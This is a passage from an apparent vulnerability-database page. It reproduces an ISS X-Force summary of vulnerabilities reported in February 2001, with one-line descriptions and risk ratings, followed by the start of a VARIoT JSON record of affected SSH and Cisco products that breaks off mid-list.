Date Reported: 2/17/01 Vulnerability: badblue-ext-reveal-path Platforms Affected: BadBlue Risk Factor: Low Attack Type: Network Based Brief Description: BadBlue ext.dll library reveals path X-Force URL: http://xforce.iss.net/static/6130.php
Date Reported: 2/17/01 Vulnerability: badblue-ext-dos Platforms Affected: BadBlue Risk Factor: Medium Attack Type: Network Based Brief Description: BadBlue ext.dll library denial of service X-Force URL: http://xforce.iss.net/static/6131.php
Date Reported: 2/17/01 Vulnerability: moby-netsuite-bo Platforms Affected: Moby's NetSuite Risk Factor: Medium Attack Type: Network Based Brief Description: Moby's NetSuite Web server buffer overflow X-Force URL: http://xforce.iss.net/static/6132.php
Date Reported: 2/16/01 Vulnerability: webactive-directory-traversal Platforms Affected: WEBactive Risk Factor: Medium Attack Type: Network/Host Based Brief Description: WEBactive HTTP Server directory traversal X-Force URL: http://xforce.iss.net/static/6121.php
Date Reported: 2/16/01 Vulnerability: esone-cgi-directory-traversal Platforms Affected: ES.One store.cgi Risk Factor: Medium Attack Type: Network Based Brief Description: Thinking Arts ES.One store.cgi directory traversal X-Force URL: http://xforce.iss.net/static/6124.php
Date Reported: 2/16/01 Vulnerability: vshell-username-bo Platforms Affected: VShell Risk Factor: High Attack Type: Network Based Brief Description: VShell username buffer overflow X-Force URL: http://xforce.iss.net/static/6146.php
Date Reported: 2/16/01 Vulnerability: vshell-port-forwarding-rule Platforms Affected: VShell Risk Factor: Medium Attack Type: Network/Host Based Brief Description: VShell uses weak port forwarding rule X-Force URL: http://xforce.iss.net/static/6148.php
Date Reported: 2/15/01 Vulnerability: pi3web-isapi-bo Platforms Affected: Pi3Web Risk Factor: Medium Attack Type: Network/Host Based Brief Description: Pi3Web ISAPI tstisapi.dll denial of service X-Force URL: http://xforce.iss.net/static/6113.php
Date Reported: 2/15/01 Vulnerability: pi3web-reveal-path Platforms Affected: Pi3Web Risk Factor: Low Attack Type: Network Based Brief Description: Pi3Web reveals physical path of server X-Force URL: http://xforce.iss.net/static/6114.php
Date Reported: 2/15/01 Vulnerability: bajie-execute-shell Platforms Affected: Bajie HTTP JServer Risk Factor: High Attack Type: Network Based Brief Description: Bajie HTTP JServer execute shell commands X-Force URL: http://xforce.iss.net/static/6117.php
Date Reported: 2/15/01 Vulnerability: bajie-directory-traversal Platforms Affected: Bajie HTTP JServer Risk Factor: High Attack Type: Network Based Brief Description: Bajie HTTP JServer directory traversal X-Force URL: http://xforce.iss.net/static/6115.php
Date Reported: 2/15/01 Vulnerability: resin-directory-traversal Platforms Affected: Resin Risk Factor: Medium Attack Type: Network Based Brief Description: Resin Web server directory traversal X-Force URL: http://xforce.iss.net/static/6118.php
Date Reported: 2/15/01 Vulnerability: netware-mitm-recover-passwords Platforms Affected: Netware Risk Factor: Low Attack Type: Network Based Brief Description: Netware "man in the middle" attack password recovery X-Force URL: http://xforce.iss.net/static/6116.php
Date Reported: 2/14/01 Vulnerability: firebox-pptp-dos Platforms Affected: WatchGuard Firebox II Risk Factor: High Attack Type: Network Based Brief Description: WatchGuard Firebox II PPTP denial of service X-Force URL: http://xforce.iss.net/static/6109.php
Date Reported: 2/14/01 Vulnerability: hp-virtualvault-iws-dos Platforms Affected: HP VirtualVault Risk Factor: Medium Attack Type: Network/Host Based Brief Description: HP VirtualVault iPlanet Web Server denial of service X-Force URL: http://xforce.iss.net/static/6110.php
Date Reported: 2/14/01 Vulnerability: kicq-execute-commands Platforms Affected: KICQ Risk Factor: High Attack Type: Network Based Brief Description: kicq could allow remote execution of commands X-Force URL: http://xforce.iss.net/static/6112.php
Date Reported: 2/14/01 Vulnerability: hp-text-editor-bo Platforms Affected: HPUX Risk Factor: Medium Attack Type: Host Based Brief Description: HP Text editors buffer overflow X-Force URL: http://xforce.iss.net/static/6111.php
Date Reported: 2/13/01 Vulnerability: sendtemp-pl-read-files Platforms Affected: sendtemp.pl Risk Factor: Medium Attack Type: Network/Host Based Brief Description: sendtemp.pl could allow an attacker to read files on the server X-Force URL: http://xforce.iss.net/static/6104.php
Date Reported: 2/13/01 Vulnerability: analog-alias-bo Platforms Affected: Analog ALIAS Risk Factor: Medium Attack Type: Network/Host Based Brief Description: Analog ALIAS command buffer overflow X-Force URL: http://xforce.iss.net/static/6105.php
Date Reported: 2/13/01 Vulnerability: elm-long-string-bo Platforms Affected: Elm Risk Factor: Medium Attack Type: Host Based Brief Description: ELM -f command long string buffer overflow X-Force URL: http://xforce.iss.net/static/6151.php
Date Reported: 2/13/01 Vulnerability: winnt-pptp-dos Platforms Affected: Windows NT Risk Factor: Medium Attack Type: Network Based Brief Description: Windows NT PPTP denial of service X-Force URL: http://xforce.iss.net/static/6103.php
Date Reported: 2/12/01 Vulnerability: startinnfeed-format-string Platforms Affected: Inn Risk Factor: High Attack Type: Host Based Brief Description: Inn 'startinnfeed' binary format string attack X-Force URL: http://xforce.iss.net/static/6099.php
Date Reported: 2/12/01 Vulnerability: his-auktion-cgi-url Platforms Affected: HIS Auktion Risk Factor: Medium Attack Type: Network/Host Based Brief Description: HIS Auktion CGI script could allow attackers to view unauthorized files or execute commands X-Force URL: http://xforce.iss.net/static/6090.php
Date Reported: 2/12/01 Vulnerability: wayboard-cgi-view-files Platforms Affected: Way-BOARD Risk Factor: Medium Attack Type: Network Based Brief Description: Way-BOARD CGI could allow attackers to view unauthorized files X-Force URL: http://xforce.iss.net/static/6091.php
Date Reported: 2/12/01 Vulnerability: muskat-empower-url-dir Platforms Affected: Musket Empower Risk Factor: Low Attack Type: Network/Host Based Brief Description: Musket Empower could allow attackers to gain access to the DB directory path X-Force URL: http://xforce.iss.net/static/6093.php
Date Reported: 2/12/01 Vulnerability: icq-icu-rtf-dos Platforms Affected: LICQ Gnome ICU Risk Factor: Low Attack Type: Network/Host Based Brief Description: LICQ and Gnome ICU rtf file denial of service X-Force URL: http://xforce.iss.net/static/6096.php
Date Reported: 2/12/01 Vulnerability: commerce-cgi-view-files Platforms Affected: Commerce.cgi Risk Factor: Medium Attack Type: Network Based Brief Description: Commerce.cgi could allow attackers to view unauthorized files X-Force URL: http://xforce.iss.net/static/6095.php
Date Reported: 2/12/01 Vulnerability: roads-search-view-files Platforms Affected: ROADS Risk Factor: Medium Attack Type: Network Based Brief Description: ROADS could allow attackers to view unauthorized files using search.pl program X-Force URL: http://xforce.iss.net/static/6097.php
Date Reported: 2/12/01 Vulnerability: webpage-cgi-view-info Platforms Affected: WebPage.cgi Risk Factor: Low Attack Type: Network Based Brief Description: WebPage.cgi allows attackers to view sensitive information X-Force URL: http://xforce.iss.net/static/6100.php
Date Reported: 2/12/01 Vulnerability: webspirs-cgi-view-files Platforms Affected: WebSPIRS Risk Factor: Medium Attack Type: Network Based Brief Description: WebSPIRS CGI could allow an attacker to view unauthorized files X-Force URL: http://xforce.iss.net/static/6101.php
Date Reported: 2/12/01 Vulnerability: webpals-library-cgi-url Platforms Affected: WebPALS Risk Factor: Medium Attack Type: Network Based Brief Description: WebPALS Library System CGI script could allow attackers to view unauthorized files or execute commands X-Force URL: http://xforce.iss.net/static/6102.php
Date Reported: 2/11/01 Vulnerability: cobol-apptrack-nolicense-permissions Platforms Affected: MicroFocus Cobol Risk Factor: High Attack Type: Host Based Brief Description: MicroFocus Cobol with AppTrack enabled with nolicense permissions X-Force URL: http://xforce.iss.net/static/6092.php
Date Reported: 2/11/01 Vulnerability: cobol-apptrack-nolicense-symlink Platforms Affected: MicroFocus Cobol Risk Factor: High Attack Type: Host Based Brief Description: MicroFocus Cobol with AppTrack enabled allows symlink in nolicense X-Force URL: http://xforce.iss.net/static/6094.php
Date Reported: 2/10/01 Vulnerability: vixie-crontab-bo Platforms Affected: Vixie crontab Risk Factor: Medium Attack Type: Host Based Brief Description: Vixie crontab buffer overflow X-Force URL: http://xforce.iss.net/static/6098.php
Date Reported: 2/10/01 Vulnerability: novell-groupwise-bypass-policies Platforms Affected: Novell GroupWise Risk Factor: Medium Attack Type: Network/Host Based Brief Description: Novell Groupwise allows user to bypass policies and view files X-Force URL: http://xforce.iss.net/static/6089.php
Date Reported: 2/9/01 Vulnerability: infobot-calc-gain-access Platforms Affected: Infobot Risk Factor: High Attack Type: Network Based Brief Description: Infobot 'calc' command allows remote users to gain access X-Force URL: http://xforce.iss.net/static/6078.php
Date Reported: 2/8/01 Vulnerability: linux-sysctl-read-memory Platforms Affected: Linux Risk Factor: Medium Attack Type: Host Based Brief Description: Linux kernel sysctl() read memory X-Force URL: http://xforce.iss.net/static/6079.php
Date Reported: 2/8/01 Vulnerability: openssh-bypass-authentication Platforms Affected: OpenSSH Risk Factor: High Attack Type: Network/Host Based Brief Description: OpenSSH 2.3.1 allows remote users to bypass authentication X-Force URL: http://xforce.iss.net/static/6084.php
Date Reported: 2/8/01 Vulnerability: lotus-notes-stored-forms Platforms Affected: Lotus Notes Risk Factor: High Attack Type: Network/Host Based Brief Description: Lotus Notes stored forms X-Force URL: http://xforce.iss.net/static/6087.php
Date Reported: 2/8/01 Vulnerability: linux-ptrace-modify-process Platforms Affected: Linux Risk Factor: High Attack Type: Host Based Brief Description: Linux kernel ptrace modify process X-Force URL: http://xforce.iss.net/static/6080.php
Date Reported: 2/8/01 Vulnerability: ssh-deattack-overwrite-memory Platforms Affected: SSH Risk Factor: High Attack Type: Network/Host Based Brief Description: SSH protocol 1.5 deattack.c allows memory to be overwritten X-Force URL: http://xforce.iss.net/static/6083.php
Date Reported: 2/7/01 Vulnerability: dc20ctrl-port-bo Platforms Affected: FreeBSD Risk Factor: Medium Attack Type: Host Based Brief Description: FreeBSD dc20ctrl port buffer overflow X-Force URL: http://xforce.iss.net/static/6077.php
Date Reported: 2/7/01 Vulnerability: ja-xklock-bo Platforms Affected: FreeBSD Risk Factor: High Attack Type: Host Based Brief Description: ja-xklock buffer overflow X-Force URL: http://xforce.iss.net/static/6073.php
Date Reported: 2/7/01 Vulnerability: ja-elvis-elvrec-bo Platforms Affected: FreeBSD Risk Factor: High Attack Type: Host Based Brief Description: FreeBSD ja-elvis port buffer overflow X-Force URL: http://xforce.iss.net/static/6074.php
Date Reported: 2/7/01 Vulnerability: ko-helvis-elvrec-bo Platforms Affected: FreeBSD Risk Factor: High Attack Type: Host Based Brief Description: FreeBSD ko-helvis port buffer overflow X-Force URL: http://xforce.iss.net/static/6075.php
Date Reported: 2/7/01 Vulnerability: serverworx-directory-traversal Platforms Affected: ServerWorx Risk Factor: Medium Attack Type: Network Based Brief Description: ServerWorx directory traversal X-Force URL: http://xforce.iss.net/static/6081.php
Date Reported: 2/7/01 Vulnerability: ntlm-ssp-elevate-privileges Platforms Affected: NTLM Risk Factor: High Attack Type: Host Based Brief Description: NTLM Security Support Provider could allow elevation of privileges X-Force URL: http://xforce.iss.net/static/6076.php
Date Reported: 2/7/01 Vulnerability: ssh-session-key-recovery Platforms Affected: SSH Risk Factor: High Attack Type: Network/Host Based Brief Description: SSH protocol 1.5 session key recovery X-Force URL: http://xforce.iss.net/static/6082.php
Date Reported: 2/6/01 Vulnerability: aolserver-directory-traversal Platforms Affected: AOLserver Risk Factor: Medium Attack Type: Network Based Brief Description: AOLserver directory traversal X-Force URL: http://xforce.iss.net/static/6069.php
Date Reported: 2/6/01 Vulnerability: chilisoft-asp-elevate-privileges Platforms Affected: Chili!Soft Risk Factor: High Attack Type: Network/Host Based Brief Description: Chili!Soft ASP could allow elevated privileges X-Force URL: http://xforce.iss.net/static/6072.php
Date Reported: 2/6/01 Vulnerability: win-udp-dos Platforms Affected: Windows Risk Factor: Medium Attack Type: Network/Host Based Brief Description: Windows UDP socket denial of service X-Force URL: http://xforce.iss.net/static/6070.php
Date Reported: 2/5/01 Vulnerability: ssh-daemon-failed-login Platforms Affected: SSH Risk Factor: High Attack Type: Network/Host Based Brief Description: SSH daemon failed login attempts are not logged X-Force URL: http://xforce.iss.net/static/6071.php
Date Reported: 2/5/01 Vulnerability: picserver-directory-traversal Platforms Affected: PicServer Risk Factor: Medium Attack Type: Network Based Brief Description: PicServer directory traversal X-Force URL: http://xforce.iss.net/static/6065.php
Date Reported: 2/5/01 Vulnerability: biblioweb-directory-traversal Platforms Affected: BiblioWeb Risk Factor: Medium Attack Type: Network Based Brief Description: BiblioWeb Server directory traversal X-Force URL: http://xforce.iss.net/static/6066.php
Date Reported: 2/5/01 Vulnerability: biblioweb-get-dos Platforms Affected: BiblioWeb Risk Factor: Low Attack Type: Network Based Brief Description: BiblioWeb Server GET request denial of service X-Force URL: http://xforce.iss.net/static/6068.php
Date Reported: 2/5/01 Vulnerability: ibm-netcommerce-reveal-information Platforms Affected: IBM Risk Factor: Medium Attack Type: Network/Host Based Brief Description: IBM Net.Commerce could reveal sensitive information X-Force URL: http://xforce.iss.net/static/6067.php
Date Reported: 2/5/01 Vulnerability: win-dde-elevate-privileges Platforms Affected: Windows DDE Risk Factor: High Attack Type: Host Based Brief Description: Windows DDE can allow the elevation of privileges X-Force URL: http://xforce.iss.net/static/6062.php
Date Reported: 2/4/01 Vulnerability: hsweb-directory-browsing Platforms Affected: HSWeb Risk Factor: Low Attack Type: Network Based Brief Description: HSWeb Web Server allows attacker to browse directories X-Force URL: http://xforce.iss.net/static/6061.php
Date Reported: 2/4/01 Vulnerability: sedum-directory-traversal Platforms Affected: SEDUM Risk Factor: Medium Attack Type: Network Based Brief Description: SEDUM HTTP Server directory traversal X-Force URL: http://xforce.iss.net/static/6063.php
Date Reported: 2/4/01 Vulnerability: free-java-directory-traversal Platforms Affected: Free Java Risk Factor: Medium Attack Type: Network Based Brief Description: Free Java Web Server directory traversal X-Force URL: http://xforce.iss.net/static/6064.php
Date Reported: 2/2/01 Vulnerability: goahead-directory-traversal Platforms Affected: GoAhead Risk Factor: High Attack Type: Network Based Brief Description: GoAhead Web Server directory traversal X-Force URL: http://xforce.iss.net/static/6046.php
Date Reported: 2/2/01 Vulnerability: gnuserv-tcp-cookie-overflow Platforms Affected: Gnuserv Risk Factor: High Attack Type: Network/Host Based Brief Description: Gnuserv TCP enabled cookie buffer overflow X-Force URL: http://xforce.iss.net/static/6056.php
Date Reported: 2/2/01 Vulnerability: xmail-ctrlserver-bo Platforms Affected: Xmail CTRLServer Risk Factor: High Attack Type: Network Based Brief Description: XMail CTRLServer buffer overflow X-Force URL: http://xforce.iss.net/static/6060.php
Date Reported: 2/2/01 Vulnerability: netscape-webpublisher-acl-permissions Platforms Affected: Netscape Web Publisher Risk Factor: Medium Attack Type: Network Based Brief Description: Netcape Web Publisher poor ACL permissions X-Force URL: http://xforce.iss.net/static/6058.php
Date Reported: 2/1/01 Vulnerability: cups-httpgets-dos Platforms Affected: CUPS Risk Factor: High Attack Type: Host Based Brief Description: CUPS httpGets() function denial of service X-Force URL: http://xforce.iss.net/static/6043.php
Date Reported: 2/1/01 Vulnerability: prospero-get-pin Platforms Affected: Prospero Risk Factor: High Attack Type: Network/Host Based Brief Description: Prospero GET request reveals PIN information X-Force URL: http://xforce.iss.net/static/6044.php
Date Reported: 2/1/01 Vulnerability: prospero-weak-permissions Platforms Affected: Prospero Risk Factor: High Attack Type: Network/Host Based Brief Description: Prospero uses weak permissions X-Force URL: http://xforce.iss.net/static/6045.php
Risk Factor Key:
High Any vulnerability that provides an attacker with immediate
access into a machine, gains superuser access, or bypasses
a firewall. Example: A vulnerable Sendmail 8.6.5 version
that allows an intruder to execute commands on mail
server.
Medium Any vulnerability that provides information that has a
high potential of giving system access to an intruder.
Example: A misconfigured TFTP or vulnerable NIS server
that allows an intruder to get the password file that
could contain an account with a guessable password.
Low Any vulnerability that provides information that
potentially could lead to a compromise. Example: A
finger that allows an intruder to find out who is online
and potential accounts to attempt to crack passwords
via brute force methods.
ISS is a leading global provider of security management solutions for e-business. By offering best-of-breed SAFEsuite(tm) security software, comprehensive ePatrol(tm) monitoring services and industry-leading expertise, ISS serves as its customers' trusted security provider protecting digital assets and ensuring the availability, confidentiality and integrity of computer systems and information critical to e-business success. ISS' security management solutions protect more than 5,000 customers including 21 of the 25 largest U.S. commercial banks, 9 of the 10 largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe and Latin America. For more information, visit the ISS Web site at www.iss.net or call 800-776-2362.
Copyright (c) 2001 by Internet Security Systems, Inc.
Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
X-Force PGP Key available at: http://xforce.iss.net/sensitive.php as well as on MIT's PGP key server and PGP.com's key server.
Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc.
-----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv
iQCVAwUBOqb8ojRfJiV99eG9AQGEaAP+KH+SQYNBsbUcv/mUJNUz7dDPIYVcmPNV 1xyO/ctnG6qScWnlXGltYS7Rj8T8tYAAZC77oDhFSvvs8CX1Dr32ImEyvOIJhMLA h0wKCV3HOAYJ662BASe3jbO3nL/bumNKCRL5heuIU85pQOuH9xbqXkmFEimDmG2B tT+ylKw4hn4= =kfHg -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200106-0080",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 3.2,
"vendor": "ssh security",
"version": null
},
{
"model": null,
"scope": null,
"trust": 2.4,
"vendor": "openssh",
"version": null
},
{
"model": "catalyst csx",
"scope": "eq",
"trust": 2.4,
"vendor": "cisco",
"version": "60005.3"
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1 ex",
"scope": null,
"trust": 1.2,
"vendor": "cisco",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "2.1"
},
{
"model": "ssh",
"scope": "lte",
"trust": 1.0,
"vendor": "ssh",
"version": "1.2.31"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "2.1.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "1.2.3"
},
{
"model": "ios 12.2xq",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xh",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xe",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xd",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2xa",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.2t",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "12.2"
},
{
"model": "ios 12.1yf",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1yd",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1yc",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1yb",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xu",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xt",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xq",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xp",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xm",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xl",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xj",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xi",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xh",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xg",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xf",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xc",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xb",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1t",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1ec",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1e",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.0s",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "60006.2(0.110)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "60006.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "60005.5"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "core sdi",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "smoothwall",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "holger lamm",
"version": null
},
{
"model": "communications security ssh",
"scope": "eq",
"trust": 0.6,
"vendor": "ssh",
"version": "1.2.31"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "2.1.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "2.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openssh",
"version": "1.2.3"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "5.3(1)"
},
{
"model": "pix firewall",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "5.2(5)"
},
{
"model": "ios 12.1ya",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xy",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "12.1xv"
},
{
"model": "ios 12.1xs",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xr",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xk",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xe",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xd",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1xa",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1ez",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1ey",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1ex",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1dc",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "ios 12.1db",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "webns b11s",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": "5.0"
},
{
"model": "webns 1b6s",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": "5.0"
},
{
"model": "webns 0b22s",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": "4.1"
},
{
"model": "webns 1b42s",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": "4.0"
},
{
"model": "pix firewall",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": "6.0(1)"
},
{
"model": "catalyst pan",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": "60006.3"
},
{
"model": "catalyst",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": "60006.2(0.111)"
},
{
"model": "catalyst",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": "60006.1(2.13)"
},
{
"model": "ssh",
"scope": "eq",
"trust": 0.6,
"vendor": "ssh",
"version": "1.2.31"
},
{
"model": "communications security ssh",
"scope": "eq",
"trust": 0.3,
"vendor": "ssh",
"version": "1.2.30"
},
{
"model": "communications security ssh",
"scope": "eq",
"trust": 0.3,
"vendor": "ssh",
"version": "1.2.29"
},
{
"model": "communications security ssh",
"scope": "eq",
"trust": 0.3,
"vendor": "ssh",
"version": "1.2.28"
},
{
"model": "communications security ssh",
"scope": "eq",
"trust": 0.3,
"vendor": "ssh",
"version": "1.2.27"
},
{
"model": "communications security ssh",
"scope": "eq",
"trust": 0.3,
"vendor": "ssh",
"version": "1.2.26"
},
{
"model": "communications security ssh",
"scope": "eq",
"trust": 0.3,
"vendor": "ssh",
"version": "1.2.25"
},
{
"model": "communications security ssh",
"scope": "eq",
"trust": 0.3,
"vendor": "ssh",
"version": "1.2.24"
},
{
"model": "computing safeword agent for ssh",
"scope": "eq",
"trust": 0.3,
"vendor": "secure",
"version": "1.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "2.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "1.2.2"
},
{
"model": "screenos r2",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "3.1.1"
},
{
"model": "screenos r9",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "3.1"
},
{
"model": "screenos r2",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "3.1"
},
{
"model": "screenos r1",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "3.1"
},
{
"model": "screenos r1.1",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "3.0.3"
},
{
"model": "screenos r2",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "3.0.1"
},
{
"model": "screenos r5",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "2.6.1"
},
{
"model": "screenos r4",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "2.6.1"
},
{
"model": "screenos r3",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "2.6.1"
},
{
"model": "screenos r2",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "2.6.1"
},
{
"model": "screenos r1",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "2.6.1"
},
{
"model": "screenos",
"scope": "eq",
"trust": 0.3,
"vendor": "netscreen",
"version": "2.6.1"
},
{
"model": "ios 12.10s",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "communications security ssh2",
"scope": "ne",
"trust": 0.3,
"vendor": "ssh",
"version": "2.4"
},
{
"model": "communications security ssh2",
"scope": "ne",
"trust": 0.3,
"vendor": "ssh",
"version": "2.3"
},
{
"model": "communications security ssh2",
"scope": "ne",
"trust": 0.3,
"vendor": "ssh",
"version": "2.2"
},
{
"model": "communications security ssh2",
"scope": "ne",
"trust": 0.3,
